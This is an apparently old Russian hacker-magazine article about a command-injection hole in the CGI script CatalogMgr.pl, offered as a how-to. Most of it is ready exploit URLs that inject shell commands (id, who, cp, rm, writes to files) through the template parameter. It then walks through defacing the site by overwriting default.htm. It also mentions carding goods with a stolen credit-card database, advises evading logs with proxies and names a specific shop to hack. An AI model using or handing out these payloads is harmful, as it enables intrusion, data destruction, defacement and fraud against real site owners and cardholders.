Привет, перцы. Сегодня решил я рассказать
вам о дыре, которая называется CatalogMgr.pl

Exploit:

http://www.blablabla.com/cgi-bin/CatalogMgr.pl?cartID= b-6286&SearchField=category&SearchFor=DVD+Players
&template=;команда|
http://www.blablabla.com/cgi-bin/CatalogMgr.pl?cartID= b-6286&SearchField=category&SearchFor=DVD+Players
&template=файл

Итак, что же дает нам эта уязвимость? Как
ты уже догадался, мы можем смотреть все
файлы и директории на диске. Но, помимо
этого, мы можем выполнять некоторые команды.

http://www.blablabla.com/cgi-bin/CatalogMgr.pl?cartID= b-6286&SearchField=category&SearchFor=DVD+Players
&template=;echo "string" >> file_name|
http://www.blablabla.com/cgi-bin/CatalogMgr.pl?cartID= b-6286&SearchField=category&SearchFor=DVD+Players
&template=;who|
http://www.blablabla.com/cgi-bin/CatalogMgr.pl?cartID= b-6286&SearchField=category&SearchFor=DVD+Players
&template=;id|
http://www.blablabla.com/cgi-bin/CatalogMgr.pl?cartID= b-6286&SearchField=category&SearchFor=DVD+Players
&template=;cp 1file 2file|
http://www.blablabla.com/cgi-bin/CatalogMgr.pl?cartID= b-6286&SearchField=category&SearchFor=DVD+Players
&template=;rm file_name|

Теперь, когда ты уже нашел базу сс и
накардил себе сотовый, холодильник, машину,
дом, дачу можно приступить к завершающей
части — дефейсу. Можно, конечно, получить
логин с паролем, закачать своим скриптом
файло, но на этом останавливаться не будем.
Что если ftp закрыт? Придется писать html на
месте. Все бы хорошо, но в твоем коде нельзя
использовать знак "="… Поэтому можно
сделать только текстовый дефейс, а это
ламерство. Тут к нам на помощь приходят
стили. Что же можно сделать? Стиль будет
выглядеть примерно так:

<style>BODY{background-image: url(http://www.neod.f2s.com/hacked.gif);background-repeat:
no-repeat;}</style>

Теперь нам остается набрать в браузере
строку:

http://www.blablabla.com/cgi-bin/CatalogMgr.pl?cartID= b-6286&SearchField=category&SearchFor=DVD+Players
&template=;echo "<html><head><title>Hacked by
NeodTeam</title> <style>BODY{background-image: url(http://www.myserver.com/hacked.gif);
background-repeat:no-repeat;}</style></head> <body></body><html>"
> default.htm|

Вот и все !!! (Не забывайте о прокси и логах)

P.S Для примера можете хакнуть www.inetshopping.com

Оставить мнение

Check Also

Как работает Linux: от нажатия кнопки включения до рабочего стола

Лучший способ понять, как работает операционная система, — это проследить поэтапно ее загр…